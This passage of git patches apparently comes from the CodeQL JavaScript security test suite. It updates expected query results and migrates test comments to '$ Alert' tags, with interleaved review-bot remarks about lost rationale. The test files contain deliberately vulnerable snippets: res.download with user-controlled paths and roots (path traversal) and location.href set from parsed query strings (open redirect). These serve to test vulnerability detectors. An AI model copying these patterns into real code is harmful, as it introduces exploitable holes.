tst-escapes.js:19:1:19:52 | /\\A\\B\\C ... 
\\X\\Y\\Z/ | The escape sequence '\\T' is equivalent to just 'T'. | +| tst-escapes.js:19:1:19:52 | /\\A\\B\\C ... \\X\\Y\\Z/ | The escape sequence '\\U' is equivalent to just 'U'. | +| tst-escapes.js:19:1:19:52 | /\\A\\B\\C ... \\X\\Y\\Z/ | The escape sequence '\\V' is equivalent to just 'V'. | +| tst-escapes.js:19:1:19:52 | /\\A\\B\\C ... \\X\\Y\\Z/ | The escape sequence '\\X' is equivalent to just 'X'. | +| tst-escapes.js:19:1:19:52 | /\\A\\B\\C ... \\X\\Y\\Z/ | The escape sequence '\\Y' is equivalent to just 'Y'. | +| tst-escapes.js:19:1:19:52 | /\\A\\B\\C ... \\X\\Y\\Z/ | The escape sequence '\\Z' is equivalent to just 'Z'. | +| tst-escapes.js:20:1:20:28 | /\\`\\1\\2 ... \\0\\-\\=/ | The escape sequence '\\=' is equivalent to just '='. | +| tst-escapes.js:20:1:20:28 | /\\`\\1\\2 ... \\0\\-\\=/ | The escape sequence '\\`' is equivalent to just '`'. | +| tst-escapes.js:21:1:21:28 | /\\~\\!\\@ ... \\)\\_\\+/ | The escape sequence '\\!' is equivalent to just '!'. | +| tst-escapes.js:21:1:21:28 | /\\~\\!\\@ ... \\)\\_\\+/ | The escape sequence '\\#' is equivalent to just '#'. | +| tst-escapes.js:21:1:21:28 | /\\~\\!\\@ ... \\)\\_\\+/ | The escape sequence '\\%' is equivalent to just '%'. | +| tst-escapes.js:21:1:21:28 | /\\~\\!\\@ ... \\)\\_\\+/ | The escape sequence '\\&' is equivalent to just '&'. | +| tst-escapes.js:21:1:21:28 | /\\~\\!\\@ ... \\)\\_\\+/ | The escape sequence '\\@' is equivalent to just '@'. | +| tst-escapes.js:21:1:21:28 | /\\~\\!\\@ ... \\)\\_\\+/ | The escape sequence '\\_' is equivalent to just '_'. | +| tst-escapes.js:21:1:21:28 | /\\~\\!\\@ ... \\)\\_\\+/ | The escape sequence '\\~' is equivalent to just '~'. | +| tst-escapes.js:22:1:22:15 | /\\[\\]\\'\\\\,\\.\\// | The escape sequence '\\'' is equivalent to just '''. | +| tst-escapes.js:23:1:23:16 | /\\{\\}\\"\\\|\\<\\>\\?/ | The escape sequence '\\"' is equivalent to just '"'. | +| tst-escapes.js:23:1:23:16 | /\\{\\}\\"\\\|\\<\\>\\?/ | The escape sequence '\\<' is equivalent to just '<'. 
| +| tst-escapes.js:23:1:23:16 | /\\{\\}\\"\\\|\\<\\>\\?/ | The escape sequence '\\>' is equivalent to just '>'. | +| tst-escapes.js:24:1:24:4 | /\\ / | The escape sequence '\\ ' is equivalent to just ' '. | +| tst-escapes.js:27:8:27:11 | "\\a" | The escape sequence '\\a' is equivalent to just 'a'. | +| tst-escapes.js:29:8:29:13 | "\\\\\\a" | The escape sequence '\\a' is equivalent to just 'a'. | +| tst-escapes.js:31:8:31:15 | "\\\\\\\\\\a" | The escape sequence '\\a' is equivalent to just 'a'. | +| tst-escapes.js:33:8:33:17 | "\\\\\\\\\\\\\\a" | The escape sequence '\\a' is equivalent to just 'a'. | +| tst-escapes.js:35:8:35:19 | "\\\\\\\\\\\\\\\\\\a" | The escape sequence '\\a' is equivalent to just 'a'. | +| tst-escapes.js:40:1:40:4 | "\\." | The escape sequence '\\.' is equivalent to just '.'. | +| tst-escapes.js:46:8:46:15 | "'\\'\\\\'" | The escape sequence '\\'' is equivalent to just '''. | +| tst-escapes.js:48:8:48:15 | '"\\"\\\\"' | The escape sequence '\\"' is equivalent to just '"'. | +| tst-escapes.js:64:8:64:13 | "\\\\\\]" | The escape sequence '\\]' is equivalent to just ']'. | +| tst-escapes.js:65:8:65:14 | "x\\\\\\]" | The escape sequence '\\]' is equivalent to just ']'. | +| tst-escapes.js:69:8:69:17 | "\\\\\\\\\\\\\\]" | The escape sequence '\\]' is equivalent to just ']'. | diff --git a/javascript/ql/test/query-tests/Security/CWE-020/UselessCharacterEscape/tst-escapes.js b/javascript/ql/test/query-tests/Security/CWE-020/UselessCharacterEscape/tst-escapes.js index f776c9d40e68..b65448ec41b2 100644 --- a/javascript/ql/test/query-tests/Security/CWE-020/UselessCharacterEscape/tst-escapes.js +++ b/javascript/ql/test/query-tests/Security/CWE-020/UselessCharacterEscape/tst-escapes.js @@ -1,5 +1,3 @@ -// (the lines of this file are not annotated with alert expectations) - // no backslashes RegExp("abcdefghijklmnopqrstuvxyz"); RegExp("ABCDEFGHIJKLMNOPQRSTUVXYZ"); From 87518ba60e237266d8b6aa2334a58d44778c6e48 Mon Sep 17 00:00:00 2001 
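Review bot: Removing `// (the lines of this file are not annotated with alert expectations)` leaves tst-escapes.js with no statement of which query its `// $ Alert` tags belong to. UselessCharacterEscape.expected, updated in this same commit, reports `tst-escapes.js:17:8:17:11 | "\\ "`, yet the `RegExp("\ ");` line is untagged in the previous patch's context, so the tags presumably track a different query in this directory. A replacement header such as `// $ Alert tags in this file are for <query id>; UselessCharacterEscape results are checked through the .expected file only` (query id to be filled in) would stop a later contributor from "fixing" the apparent mismatch.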
From: Asger F Date: Wed, 26 Feb 2025 13:09:21 +0100 Subject: [PATCH 133/892] JS: Update tainted-sendFile.js This file was added on main while this branch was in progress. Porting the whole file in one step. --- .../CWE-022/TaintedPath/TaintedPath.expected | 24 +++++++++---------- .../CWE-022/TaintedPath/tainted-sendFile.js | 13 ++++------ 2 files changed, 17 insertions(+), 20 deletions(-) diff --git a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/TaintedPath.expected b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/TaintedPath.expected index 14fcafa92069..338cd21265d3 100644 --- a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/TaintedPath.expected +++ b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/TaintedPath.expected 
@@ -161,10 +161,10 @@ | tainted-sendFile.js:15:43:15:58 | req.param("dir") | tainted-sendFile.js:15:43:15:58 | req.param("dir") | tainted-sendFile.js:15:43:15:58 | req.param("dir") | This path depends on a $@. | tainted-sendFile.js:15:43:15:58 | req.param("dir") | user-provided value | | tainted-sendFile.js:21:16:21:49 | path.re ... rams.x) | tainted-sendFile.js:21:37:21:48 | req.params.x | tainted-sendFile.js:21:16:21:49 | path.re ... rams.x) | This path depends on a $@. | tainted-sendFile.js:21:37:21:48 | req.params.x | user-provided value | | tainted-sendFile.js:22:16:22:46 | path.jo ... rams.x) | tainted-sendFile.js:22:34:22:45 | req.params.x | tainted-sendFile.js:22:16:22:46 | path.jo ... rams.x) | This path depends on a $@. | tainted-sendFile.js:22:34:22:45 | req.params.x | user-provided value | -| tainted-sendFile.js:27:16:27:33 | req.param("gimme") | tainted-sendFile.js:27:16:27:33 | req.param("gimme") | tainted-sendFile.js:27:16:27:33 | req.param("gimme") | This path depends on a $@. | tainted-sendFile.js:27:16:27:33 | req.param("gimme") | user-provided value | -| tainted-sendFile.js:30:16:30:48 | homeDir ... arams.x | tainted-sendFile.js:30:37:30:48 | req.params.x | tainted-sendFile.js:30:16:30:48 | homeDir ... arams.x | This path depends on a $@. | tainted-sendFile.js:30:37:30:48 | req.params.x | user-provided value | -| tainted-sendFile.js:32:16:32:46 | path.jo ... rams.x) | tainted-sendFile.js:32:34:32:45 | req.params.x | tainted-sendFile.js:32:16:32:46 | path.jo ... rams.x) | This path depends on a $@. | tainted-sendFile.js:32:34:32:45 | req.params.x | user-provided value | -| tainted-sendFile.js:35:43:35:58 | req.param("dir") | tainted-sendFile.js:35:43:35:58 | req.param("dir") | tainted-sendFile.js:35:43:35:58 | req.param("dir") | This path depends on a $@. 
| tainted-sendFile.js:35:43:35:58 | req.param("dir") | user-provided value | +| tainted-sendFile.js:26:16:26:33 | req.param("gimme") | tainted-sendFile.js:26:16:26:33 | req.param("gimme") | tainted-sendFile.js:26:16:26:33 | req.param("gimme") | This path depends on a $@. | tainted-sendFile.js:26:16:26:33 | req.param("gimme") | user-provided value | +| tainted-sendFile.js:28:16:28:48 | homeDir ... arams.x | tainted-sendFile.js:28:37:28:48 | req.params.x | tainted-sendFile.js:28:16:28:48 | homeDir ... arams.x | This path depends on a $@. | tainted-sendFile.js:28:37:28:48 | req.params.x | user-provided value | +| tainted-sendFile.js:30:16:30:46 | path.jo ... rams.x) | tainted-sendFile.js:30:34:30:45 | req.params.x | tainted-sendFile.js:30:16:30:46 | path.jo ... rams.x) | This path depends on a $@. | tainted-sendFile.js:30:34:30:45 | req.params.x | user-provided value | +| tainted-sendFile.js:32:43:32:58 | req.param("dir") | tainted-sendFile.js:32:43:32:58 | req.param("dir") | tainted-sendFile.js:32:43:32:58 | req.param("dir") | This path depends on a $@. | tainted-sendFile.js:32:43:32:58 | req.param("dir") | user-provided value | | tainted-string-steps.js:8:18:8:34 | path.substring(4) | tainted-string-steps.js:6:24:6:30 | req.url | tainted-string-steps.js:8:18:8:34 | path.substring(4) | This path depends on a $@. | tainted-string-steps.js:6:24:6:30 | req.url | user-provided value | | tainted-string-steps.js:9:18:9:37 | path.substring(0, i) | tainted-string-steps.js:6:24:6:30 | req.url | tainted-string-steps.js:9:18:9:37 | path.substring(0, i) | This path depends on a $@. | tainted-string-steps.js:6:24:6:30 | req.url | user-provided value | | tainted-string-steps.js:10:18:10:31 | path.substr(4) | tainted-string-steps.js:6:24:6:30 | req.url | tainted-string-steps.js:10:18:10:31 | path.substr(4) | This path depends on a $@. | tainted-string-steps.js:6:24:6:30 | req.url | user-provided value | 
@@ -571,8 +571,8 @@ edges | tainted-promise-steps.js:12:20:12:23 | path | tainted-promise-steps.js:12:44:12:47 | path | provenance | | | tainted-sendFile.js:21:37:21:48 | req.params.x | tainted-sendFile.js:21:16:21:49 | path.re ... rams.x) | provenance | Config | | tainted-sendFile.js:22:34:22:45 | req.params.x | tainted-sendFile.js:22:16:22:46 | path.jo ... rams.x) | provenance | Config | -| tainted-sendFile.js:30:37:30:48 | req.params.x | tainted-sendFile.js:30:16:30:48 | homeDir ... arams.x | provenance | Config | -| tainted-sendFile.js:32:34:32:45 | req.params.x | tainted-sendFile.js:32:16:32:46 | path.jo ... rams.x) | provenance | Config | +| tainted-sendFile.js:28:37:28:48 | req.params.x | tainted-sendFile.js:28:16:28:48 | homeDir ... arams.x | provenance | Config | +| tainted-sendFile.js:30:34:30:45 | req.params.x | tainted-sendFile.js:30:16:30:46 | path.jo ... rams.x) | provenance | Config | | tainted-string-steps.js:6:7:6:48 | path | tainted-string-steps.js:8:18:8:21 | path | provenance | | | tainted-string-steps.js:6:7:6:48 | path | tainted-string-steps.js:9:18:9:21 | path | provenance | | | tainted-string-steps.js:6:7:6:48 | path | tainted-string-steps.js:10:18:10:21 | path | provenance | | 
@@ -1080,12 +1080,12 @@ nodes | tainted-sendFile.js:21:37:21:48 | req.params.x | semmle.label | req.params.x | | tainted-sendFile.js:22:16:22:46 | path.jo ... rams.x) | semmle.label | path.jo ... rams.x) | | tainted-sendFile.js:22:34:22:45 | req.params.x | semmle.label | req.params.x | -| tainted-sendFile.js:27:16:27:33 | req.param("gimme") | semmle.label | req.param("gimme") | -| tainted-sendFile.js:30:16:30:48 | homeDir ... arams.x | semmle.label | homeDir ... arams.x | -| tainted-sendFile.js:30:37:30:48 | req.params.x | semmle.label | req.params.x | -| tainted-sendFile.js:32:16:32:46 | path.jo ... rams.x) | semmle.label | path.jo ... rams.x) | -| tainted-sendFile.js:32:34:32:45 | req.params.x | semmle.label | req.params.x | -| tainted-sendFile.js:35:43:35:58 | req.param("dir") | semmle.label | req.param("dir") | +| tainted-sendFile.js:26:16:26:33 | req.param("gimme") | semmle.label | req.param("gimme") | +| tainted-sendFile.js:28:16:28:48 | homeDir ... arams.x | semmle.label | homeDir ... arams.x | +| tainted-sendFile.js:28:37:28:48 | req.params.x | semmle.label | req.params.x | +| tainted-sendFile.js:30:16:30:46 | path.jo ... rams.x) | semmle.label | path.jo ... rams.x) | +| tainted-sendFile.js:30:34:30:45 | req.params.x | semmle.label | req.params.x | +| tainted-sendFile.js:32:43:32:58 | req.param("dir") | semmle.label | req.param("dir") | | tainted-string-steps.js:6:7:6:48 | path | semmle.label | path | | tainted-string-steps.js:6:14:6:37 | url.par ... , true) | semmle.label | url.par ... , true) | | tainted-string-steps.js:6:14:6:43 | url.par ... ).query | semmle.label | url.par ... ).query | diff --git a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/tainted-sendFile.js b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/tainted-sendFile.js index 9a200f2a4c99..1c58a6943fa2 100644 --- a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/tainted-sendFile.js 
+++ b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/tainted-sendFile.js @@ -23,17 +23,14 @@ app.get('/some/path/:x', function(req, res) { res.sendFile(homeDir + path.join('data', req.params.x)); // kinda OK - can only escape from 'data/' - // BAD: downloading a file based on un-sanitized query parameters - res.download(req.param("gimme")); + res.download(req.param("gimme")); // $ Alert - // BAD: download allows ../ - res.download(homeDir + '/data/' + req.params.x); + res.download(homeDir + '/data/' + req.params.x); // $ Alert - res.download(path.join('data', req.params.x)); // NOT OK + res.download(path.join('data', req.params.x)); // $ Alert - // BAD: doesn't help if user controls root - res.download(req.param("file"), { root: req.param("dir") }); + res.download(req.param("file"), { root: req.param("dir") }); // $ Alert - // GOOD: ensures files cannot be accessed outside of root folder + // OK - ensures files cannot be accessed outside of root folder res.download(req.param("gimme"), { root: process.cwd() }); }); From b4ac2f7d73eb6bc330d13230b7fffd99b71812f9 Mon Sep 17 00:00:00 2001 From: Asger F Date: Wed, 26 Feb 2025 13:21:07 +0100 Subject: [PATCH 134/892] JS: Add a query ID --- .../ql/test/query-tests/Security/CWE-200/googlecompiler.js | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/javascript/ql/test/query-tests/Security/CWE-200/googlecompiler.js b/javascript/ql/test/query-tests/Security/CWE-200/googlecompiler.js index b71ed168533f..4a92f5f29fb4 100644 --- a/javascript/ql/test/query-tests/Security/CWE-200/googlecompiler.js +++ b/javascript/ql/test/query-tests/Security/CWE-200/googlecompiler.js @@ -34,7 +34,7 @@ function PostCode(codestring) { }); }); - post_req.write(post_data); // $ Alert - post the data from file to request body + post_req.write(post_data); // $ Alert[js/file-access-to-http] - post the data from file to request body post_req.end(); } From fd6a9c614408c897261b96be25896cef6f513b4a Mon Sep 17 00:00:00 2001 
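Review bot: The four `res.download` lines lose the reason each call is unsafe: the removed `// BAD:` comments said that `download` allows `../` and that a user-controlled `root` does not help, and the bare `// $ Alert` tags say neither. The expectation syntax accepts trailing text after ` - ` (the googlecompiler.js test later on this page uses it), so the rationale can stay on the same line, e.g. `res.download(req.param("file"), { root: req.param("dir") }); // $ Alert - root is user-controlled, so it does not confine the path`. The same applies to `res.download(homeDir + '/data/' + req.params.x); // $ Alert - download allows ../`. The route handler's body starts above this hunk.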
From: Asger F Date: Wed, 26 Feb 2025 13:21:20 +0100 Subject: [PATCH 135/892] JS: Accept an alert --- javascript/ql/test/query-tests/Security/CWE-400/ReDoS/tst.js | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/javascript/ql/test/query-tests/Security/CWE-400/ReDoS/tst.js b/javascript/ql/test/query-tests/Security/CWE-400/ReDoS/tst.js index c5b183cb273d..d5a28e5858dc 100644 --- a/javascript/ql/test/query-tests/Security/CWE-400/ReDoS/tst.js +++ b/javascript/ql/test/query-tests/Security/CWE-400/ReDoS/tst.js @@ -342,4 +342,4 @@ var unicode = /^\n\u0000(\u0000|.)+$/; // $ Alert[js/redos] var largeUnicode = new RegExp("^\n\u{1F680}(\u{1F680}|.)+X$"); // $ Alert[js/redos] -var unicodeSets = /(aa?)*b/v; +var unicodeSets = /(aa?)*b/v; // $ Alert[js/redos] From 19cada38ffc765705fcd9720afca34565b6c9735 Mon Sep 17 00:00:00 2001 From: Asger F Date: Wed, 26 Feb 2025 13:21:40 +0100 Subject: [PATCH 136/892] JS: Migrate a new file from OK-style comments --- .../Security/CWE-601/ClientSideUrlRedirect/tst16.js | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/javascript/ql/test/query-tests/Security/CWE-601/ClientSideUrlRedirect/tst16.js b/javascript/ql/test/query-tests/Security/CWE-601/ClientSideUrlRedirect/tst16.js index 49c88a892c9e..edeaa40174d4 100644 --- a/javascript/ql/test/query-tests/Security/CWE-601/ClientSideUrlRedirect/tst16.js +++ b/javascript/ql/test/query-tests/Security/CWE-601/ClientSideUrlRedirect/tst16.js 
@@ -2,7 +2,7 @@ import queryString from 'query-string'; import querystringify from 'querystringify'; function foo() { - location.href = queryString.parse(location.search).data; // NOT OK - location.href = queryString.extract(location.search); // NOT OK - location.href = querystringify.parse(location.search).data; // NOT OK + location.href = queryString.parse(location.search).data; // $ Alert + location.href = queryString.extract(location.search); // $ Alert + location.href = querystringify.parse(location.search).data; // $ Alert } From 64d39da5f81be4600aa207c997ed0643a711a631 Mon Sep 17 00:00:00 2001 
From: Asger F Date: Wed, 26 Feb 2025 13:57:10 +0100 Subject: [PATCH 137/892] JS: Accept Sources/Sink tags --- .../tst-UntrustedDataToExternalAPI.js | 2 +- .../CWE-022/TaintedPath/TaintedPath-es6.js | 2 +- .../CWE-022/TaintedPath/TaintedPath.js | 18 +- .../TaintedPath/examples/TaintedPath.js | 2 +- .../CWE-022/TaintedPath/normalizedPaths.js | 46 ++-- .../CWE-022/TaintedPath/other-fs-libraries.js | 10 +- .../Security/CWE-022/TaintedPath/prettier.js | 2 +- .../Security/CWE-022/TaintedPath/pupeteer.js | 2 +- .../CWE-022/TaintedPath/sharedlib-repro.js | 2 +- .../TaintedPath/tainted-access-paths.js | 6 +- .../TaintedPath/tainted-promise-steps.js | 2 +- .../TaintedPath/tainted-string-steps.js | 2 +- .../Security/CWE-022/TaintedPath/torrents.js | 2 +- .../CWE-022/TaintedPath/typescript.ts | 2 +- .../Security/CWE-022/ZipSlip/ZipSlipBad.js | 10 +- .../Security/CWE-022/ZipSlip/ZipSlipBad2.js | 2 +- .../CWE-022/ZipSlip/ZipSlipBadUnzipper.js | 2 +- .../test/query-tests/Security/CWE-073/tst.js | 4 +- .../test/query-tests/Security/CWE-073/tst2.js | 10 +- .../CWE-078/CommandInjection/actions.js | 4 +- .../CommandInjection/child_process-test.js | 18 +- .../CWE-078/CommandInjection/exec-sh.js | 4 +- .../CWE-078/CommandInjection/exec-sh2.js | 4 +- .../CWE-078/CommandInjection/execSeries.js | 2 +- .../CWE-078/CommandInjection/form-parsers.js | 12 +- .../CWE-078/CommandInjection/other.js | 2 +- .../third-party-command-injection.js | 2 +- .../IndirectCommandInjection/actions.js | 2 +- ...ommand-line-parameter-command-injection.js | 32 +-- .../second-order.js | 4 +- .../lib/isImported.js | 4 +- .../UnsafeShellCommandConstruction/lib/lib.js | 246 +++++++++--------- .../lib/lib2.js | 8 +- .../lib/subLib/amdSub.js | 4 +- .../lib/subLib/index.js | 10 +- .../lib/subLib2/compiled-file.ts | 4 +- .../lib/subLib2/special-file.js | 4 +- .../lib/subLib3/my-file.ts | 4 +- .../lib/subLib4/index.js | 2 +- .../lib/subLib4/subsub.js | 2 +- .../CWE-079/DomBasedXss/addEventListener.js | 6 +- 
.../DomBasedXss/angular-tempate-url.js | 2 +- .../CWE-079/DomBasedXss/classnames.js | 2 +- .../Security/CWE-079/DomBasedXss/clipboard.ts | 8 +- .../Security/CWE-079/DomBasedXss/d3.js | 2 +- .../Security/CWE-079/DomBasedXss/dates.js | 8 +- .../CWE-079/DomBasedXss/dragAndDrop.ts | 6 +- .../Security/CWE-079/DomBasedXss/jquery.js | 4 +- .../CWE-079/DomBasedXss/json-stringify.jsx | 2 +- .../CWE-079/DomBasedXss/jwt-server.js | 2 +- .../CWE-079/DomBasedXss/optionalSanitizer.js | 4 +- .../CWE-079/DomBasedXss/pages/[id].jsx | 6 +- .../CWE-079/DomBasedXss/react-native.js | 2 +- .../CWE-079/DomBasedXss/react-use-state.js | 8 +- .../Security/CWE-079/DomBasedXss/sanitiser.js | 2 +- .../CWE-079/DomBasedXss/stored-xss.js | 4 +- .../tainted-url-suffix-arguments.js | 2 +- .../Security/CWE-079/DomBasedXss/tooltip.jsx | 4 +- .../Security/CWE-079/DomBasedXss/translate.js | 2 +- .../CWE-079/DomBasedXss/trusted-types.js | 4 +- .../Security/CWE-079/DomBasedXss/tst.js | 62 ++--- .../Security/CWE-079/DomBasedXss/tst3.js | 2 +- .../Security/CWE-079/DomBasedXss/typeahead.js | 2 +- .../various-concat-obfuscations.js | 2 +- .../Security/CWE-079/DomBasedXss/winjs.js | 2 +- .../CWE-079/ExceptionXss/exception-xss.js | 12 +- .../CWE-079/ReflectedXss/ReflectedXss.js | 8 +- .../CWE-079/ReflectedXss/ReflectedXssGood3.js | 2 +- .../Security/CWE-079/ReflectedXss/etherpad.js | 2 +- .../CWE-079/ReflectedXss/formatting.js | 2 +- .../CWE-079/ReflectedXss/live-server.js | 4 +- .../Security/CWE-079/ReflectedXss/partial.js | 8 +- .../Security/CWE-079/ReflectedXss/promises.js | 2 +- .../Security/CWE-079/ReflectedXss/tst2.js | 14 +- .../Security/CWE-079/ReflectedXss/tst3.js | 4 +- .../StoredXss/xss-through-filenames.js | 4 +- .../CWE-079/StoredXss/xss-through-torrent.js | 2 +- .../UnsafeHtmlConstruction/jquery-plugin.js | 2 +- .../UnsafeHtmlConstruction/lib/src/MyNode.ts | 2 +- .../UnsafeHtmlConstruction/lib2/index.ts | 4 +- .../UnsafeHtmlConstruction/lib2/src/MyNode.ts | 2 +- 
.../CWE-079/UnsafeHtmlConstruction/main.js | 20 +- .../CWE-079/UnsafeHtmlConstruction/typed.ts | 4 +- .../unsafe-jquery-plugin.js | 30 +-- .../Security/CWE-079/XssThroughDom/angular.ts | 2 +- .../Security/CWE-079/XssThroughDom/forms.js | 16 +- .../CWE-079/XssThroughDom/xss-through-dom.js | 12 +- .../CWE-089/local-threat-source/test.js | 2 +- .../Security/CWE-089/typed/typedClient.ts | 4 +- .../Security/CWE-089/untyped/graphql.js | 12 +- .../CWE-089/untyped/html-sanitizer.js | 2 +- .../CWE-089/untyped/json-schema-validator.js | 4 +- .../Security/CWE-089/untyped/koarouter.js | 2 +- .../Security/CWE-089/untyped/ldap.js | 2 +- .../CWE-089/untyped/marsdb-flow-to.js | 2 +- .../Security/CWE-089/untyped/marsdb.js | 2 +- .../Security/CWE-089/untyped/minimongo.js | 2 +- .../Security/CWE-089/untyped/mongodb.js | 12 +- .../CWE-089/untyped/mongodb_bodySafe.js | 2 +- .../Security/CWE-089/untyped/mongoose.js | 4 +- .../CWE-089/untyped/mongooseJsonParse.js | 2 +- .../CWE-089/untyped/mongooseModelClient.js | 2 +- .../Security/CWE-089/untyped/mysql.js | 2 +- .../CWE-089/untyped/pg-promise-types.ts | 2 +- .../Security/CWE-089/untyped/pg-promise.js | 2 +- .../Security/CWE-089/untyped/redis.js | 4 +- .../Security/CWE-089/untyped/socketio.js | 2 +- .../Security/CWE-089/untyped/tst3.js | 2 +- .../CodeInjection/bad-code-sanitization.js | 4 +- .../Security/CWE-094/CodeInjection/express.js | 6 +- .../CWE-094/CodeInjection/lib/index.js | 8 +- .../CWE-094/CodeInjection/react-native.js | 2 +- .../CWE-094/CodeInjection/template-sinks.js | 2 +- .../Security/CWE-094/CodeInjection/tst.js | 2 +- .../UnsafeDynamicMethodAccess/example.js | 2 +- .../CWE-094/UnsafeDynamicMethodAccess/tst.js | 2 +- .../CWE-116/IncompleteSanitization/tst.js | 2 +- .../Security/CWE-117/logInjectionBad.js | 12 +- .../Security/CWE-200/FileAccessToHttp.js | 2 +- .../Security/CWE-200/bufferRead.js | 2 +- .../Security/CWE-200/googlecompiler.js | 2 +- .../Security/CWE-200/readFileSync.js | 2 +- 
.../Security/CWE-200/readStreamRead.js | 2 +- .../query-tests/Security/CWE-200/request.js | 4 +- .../Security/CWE-200/sentAsHeaders.js | 2 +- .../Security/CWE-201/PostMessageStar2.js | 2 +- .../test/query-tests/Security/CWE-209/node.js | 2 +- .../test/query-tests/Security/CWE-209/tst.js | 2 +- .../Security/CWE-312/CleartextStorage.js | 2 +- .../Security/CWE-312/CleartextStorage2.js | 2 +- .../Security/CWE-312/build-leaks.js | 6 +- .../query-tests/Security/CWE-312/passwords.js | 22 +- .../Security/CWE-312/passwords_in_server_5.js | 2 +- .../test/query-tests/Security/CWE-327/tst.js | 2 +- .../test/query-tests/Security/CWE-338/tst.js | 8 +- .../test/query-tests/Security/CWE-346/tst.js | 2 +- .../CWE-377/insecure-temporary-file.js | 6 +- .../Security/CWE-400/ReDoS/lib/closure.js | 4 +- .../Security/CWE-400/ReDoS/lib/indirect.js | 4 +- .../Security/CWE-400/ReDoS/lib/lib.js | 22 +- .../CWE-400/ReDoS/lib/moduleLib/moduleLib.js | 4 +- .../ReDoS/lib/otherLib/js/src/index.js | 4 +- .../Security/CWE-400/ReDoS/lib/snapdragon.js | 12 +- .../CWE-400/ReDoS/lib/subLib4/factory.js | 4 +- .../CWE-400/ReDoS/lib/subLib5/feature.js | 4 +- .../CWE-400/ReDoS/lib/subLib5/main.js | 4 +- .../CWE-400/ReDoS/lib/subLib5/subclass.js | 4 +- .../CWE-400/ReDoS/lib/subLib6/index.js | 4 +- .../CWE-400/ReDoS/lib/sublib/factory.js | 4 +- .../CWE-400/ReDoS/polynomial-redos.js | 148 +++++------ .../CWE-400/RemovePropertyInjection/tst.js | 2 +- .../RemovePropertyInjection/tstNonExpr.js | 2 +- .../test/query-tests/Security/CWE-506/tst.js | 4 +- .../CWE-522-DecompressionBombs/adm-zip.js | 2 +- .../CWE-522-DecompressionBombs/jszip.js | 2 +- .../CWE-522-DecompressionBombs/node-tar.js | 2 +- .../CWE-522-DecompressionBombs/pako.js | 4 +- .../CWE-522-DecompressionBombs/unzipper.js | 2 +- .../CWE-522-DecompressionBombs/yauzl.js | 2 +- .../CWE-522-DecompressionBombs/zlib.js | 8 +- .../CWE-601/ClientSideUrlRedirect/electron.js | 2 +- .../ClientSideUrlRedirect/regexp-exec.js | 10 +- 
.../ClientSideUrlRedirect/sanitizer.js | 2 +- .../CWE-601/ClientSideUrlRedirect/tst13.js | 14 +- .../CWE-601/ClientSideUrlRedirect/tst15.js | 6 +- .../CWE-601/ClientSideUrlRedirect/tst2.js | 2 +- .../CWE-601/ClientSideUrlRedirect/tst6.js | 2 +- .../CWE-601/ClientSideUrlRedirect/typed.ts | 8 +- .../ServerSideUrlRedirectGood2.js | 2 +- .../CWE-601/ServerSideUrlRedirect/express.js | 10 +- .../CWE-601/ServerSideUrlRedirect/koa.js | 2 +- .../CWE-601/ServerSideUrlRedirect/node.js | 6 +- .../ServerSideUrlRedirect/react-native.js | 2 +- .../Security/CWE-643/XpathInjectionBad.js | 2 +- .../test/query-tests/Security/CWE-643/tst.js | 2 +- .../test/query-tests/Security/CWE-643/tst2.js | 2 +- .../Security/CWE-730/RegExpInjection.js | 10 +- .../Security/CWE-730/server-crash.js | 24 +- .../test/query-tests/Security/CWE-730/tst.js | 2 +- .../CWE-754/UnsafeDynamicMethodAccess.js | 2 +- .../CWE-754/UnvalidatedDynamicMethodCall.js | 2 +- .../CWE-754/UnvalidatedDynamicMethodCall2.js | 2 +- .../UnvalidatedDynamicMethodCallGood4.js | 2 +- .../test/query-tests/Security/CWE-754/tst.js | 4 +- .../ResourceExhaustion_timeout.js | 2 +- .../ResourceExhaustion/resource-exhaustion.js | 2 +- .../query-tests/Security/CWE-776/closure.js | 2 +- .../query-tests/Security/CWE-776/domparser.js | 2 +- .../query-tests/Security/CWE-776/jquery.js | 2 +- .../test/query-tests/Security/CWE-807/tst.js | 2 +- .../Security/CWE-829/insecure-download.js | 2 +- .../Security/CWE-834/LoopBoundInjectionBad.js | 8 +- .../CWE-834/LoopBoundInjectionExitBad.js | 8 +- .../CWE-834/LoopBoundInjectionLodash.js | 2 +- .../test/query-tests/Security/CWE-843/tst.js | 8 +- .../Security/CWE-912/HttpToFileAccess.js | 2 +- .../test/query-tests/Security/CWE-912/tst.js | 2 +- .../PrototypePollutingAssignment/lib.js | 20 +- .../otherlib/src/otherlibimpl.js | 2 +- .../sublib/other.js | 2 +- .../sublib/sub.js | 2 +- .../PrototypePollutingAssignment/tst.js | 6 +- .../examples/PrototypePollutingFunction.js | 2 +- .../path-assignment.js | 8 
+- .../PrototypePollutingFunction/tests.js | 50 ++-- .../angularmerge.js | 2 +- .../src-vulnerable-lodash/tst.js | 4 +- .../webix/webix.html | 2 +- .../webix/webix.js | 2 +- .../Security/CWE-918/clientSide.js | 14 +- .../Security/CWE-918/serverSide.js | 64 ++--- 211 files changed, 797 insertions(+), 797 deletions(-) diff --git a/javascript/ql/test/query-tests/Security/CWE-020/UntrustedDataToExternalAPI/tst-UntrustedDataToExternalAPI.js b/javascript/ql/test/query-tests/Security/CWE-020/UntrustedDataToExternalAPI/tst-UntrustedDataToExternalAPI.js index f2ee8a6dd3c3..ece90af5215c 100644 --- a/javascript/ql/test/query-tests/Security/CWE-020/UntrustedDataToExternalAPI/tst-UntrustedDataToExternalAPI.js +++ b/javascript/ql/test/query-tests/Security/CWE-020/UntrustedDataToExternalAPI/tst-UntrustedDataToExternalAPI.js @@ -1,6 +1,6 @@ let externalLib = require('external-lib'); -let untrusted = window.name; +let untrusted = window.name; // $ Source externalLib(untrusted); // $ Alert externalLib({x: untrusted}); // $ Alert diff --git a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/TaintedPath-es6.js b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/TaintedPath-es6.js index 2c915a920b16..573302c33cc5 100644 --- 